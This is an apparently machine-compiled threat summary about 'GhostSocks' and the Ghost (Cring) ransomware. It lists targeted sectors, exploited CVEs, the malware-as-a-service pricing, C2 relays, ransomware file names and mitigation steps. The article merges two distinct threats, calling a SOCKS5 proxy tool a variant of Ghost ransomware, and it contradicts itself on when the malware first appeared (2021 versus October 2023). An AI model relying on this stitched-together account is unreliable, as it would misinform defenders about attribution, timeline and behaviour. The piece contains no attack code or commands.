Introduction
The GhostSocks malware [3], a variant of the Ghost ransomware also known as Cring, poses a significant threat to a wide range of organizations worldwide. This malware, which utilizes SOCKS5 to bypass detection systems and geographic restrictions [3], has been actively targeting various sectors since its identification in early 2021. The Cybersecurity and Infrastructure Security Agency (CISA) [2] [3], the Federal Bureau of Investigation (FBI) [2], and the Multi-State Information Sharing and Analysis Center (MSISAC) have issued a joint advisory to raise awareness and provide guidance on mitigating this threat.
Description
The GhostSocks malware has targeted organizations across over 70 countries [3], primarily focusing on government networks, critical infrastructure [2] [3] [4] [5], educational institutions, healthcare facilities, technology companies [1], religious organizations [1] [4], and various small to medium-sized enterprises. The group behind GhostSocks exploits common software vulnerabilities using publicly available code [1], making it a significant threat to a wide range of entities [1]. The malware exploits unpatched vulnerabilities in internet-facing devices [2], weak credentials [3], and outdated security configurations [3], often targeting known weaknesses in Fortinet appliances, Adobe ColdFusion [4] [5], and Microsoft SharePoint and Exchange servers [4]. Many of these vulnerabilities have remained unpatched for over a decade [2], highlighting the urgent need for effective patch management.
Operating under a Malware-as-a-Service model [3], GhostSocks is distributed alongside the LummaC2 infostealer [3], which enhances its post-exploitation capabilities [3]. The malware was first advertised on Russian-language forums in October 2023 and has since attracted English-speaking cybercriminals [3]. For a licensing fee of $150 in Bitcoin [3], attackers can access customizable builds of GhostSocks that incorporate obfuscation techniques to hinder analysis [3]. It primarily functions by establishing SOCKS5 back-connect proxies [3], allowing attackers to route traffic through compromised devices [3], thereby masking their activities and bypassing IP-based security measures [3].
GhostSocks employs a relay-based command-and-control (C2) infrastructure [3], utilizing Tier 1 and Tier 2 servers to obscure communication [3]. Researchers have identified critical C2 infrastructure hosted on VDSina [3], a UAE-based provider known for commercial VPNs and proxy services [3]. The group’s attacks are opportunistic, often encrypting files on the same day they breach a network [5], and they exploit common vulnerabilities and exposures (CVEs) for initial access. Notable vulnerabilities exploited include CVE-2018-13379 (Fortinet FortiOS) [5], CVE-2010-2861 and CVE-2009-3960 (Adobe ColdFusion) [5], CVE-2019-0604 (Microsoft SharePoint) [5], and several CVEs related to Microsoft Exchange (CVE-2021-34473 [5], CVE-2021-34523 [5], CVE-2021-31207) [5]. It is estimated that 34% of ransomware attacks leverage such vulnerabilities for initial access [2], with Microsoft Exchange vulnerabilities often being exploited through ProxyShell attack chains.
Ghost actors [2] [4] [5], believed to be based in China and active for approximately four years [5], are known for their rapid attack deployment. They typically initiate attacks through spear-phishing emails containing links to malicious websites or attachments that install ransomware [1]. Once they gain access [4], they utilize Command Prompt or PowerShell to download and execute malware [4], with ransomware file samples including cring.exe [4], ghost.exe [4], elysium0.exe [4], and locker.exe [4]. They may also perform additional functions to collect or alter passwords and elevate privileges [4]. Victims are unable to access their data without the encryption key [4], and the group leaves a ransom note threatening to exfiltrate and leak sensitive data if payment is not made [4]. Ransom demands can range from tens of thousands to hundreds of thousands of dollars [1]. US authorities indicate that Ghost actors tend to abandon attacks when faced with strong defenses [5], preferring to move on to easier targets [5].
To defend against Ghost ransomware attacks [5], organizations are advised to implement several key actions: maintain regular [2], known-good system backups stored offline; apply timely security updates to operating systems, software [1] [2] [3] [4] [5], and firmware; segment networks to limit lateral movement from initially infected devices; enforce phishing-resistant multi-factor authentication (MFA) for privileged accounts and email services; enhance email security; monitor for unusual commands, scripts [2] [5], and programs that may indicate Ghost activity; create allowlists; identify abnormal network activity; disable unused ports; and conduct user training on phishing awareness. The FBI notes that Ghost typically downloads less than 100 GB of data to servers associated with the group [4], underscoring the importance of vigilance and proactive security measures in an increasingly interconnected digital landscape.
Conclusion
The GhostSocks malware represents a formidable challenge to cybersecurity, exploiting long-standing vulnerabilities and leveraging sophisticated evasion techniques. Organizations must prioritize robust security measures, including regular updates and employee training, to mitigate the risk of attack [1]. As cyber threats continue to evolve, maintaining a proactive and adaptive security posture will be crucial in safeguarding sensitive data and ensuring operational resilience.
References
[1] https://www.newsduck.in/technology/fbi-warns-of-chinese-ransomware-group-ghost-issues-advisory/
[2] https://www.cohesity.com/blogs/ghost-ransomware-gang/
[3] https://www.cybersecurityintelligence.com/blog/ghostsocks-malware-can-avoid-detection-systems-8283.html
[4] https://www.securedatarecovery.com/blog/how-to-protect-data-from-ransomware
[5] https://www.hipaaguide.net/ghost-ransomware/
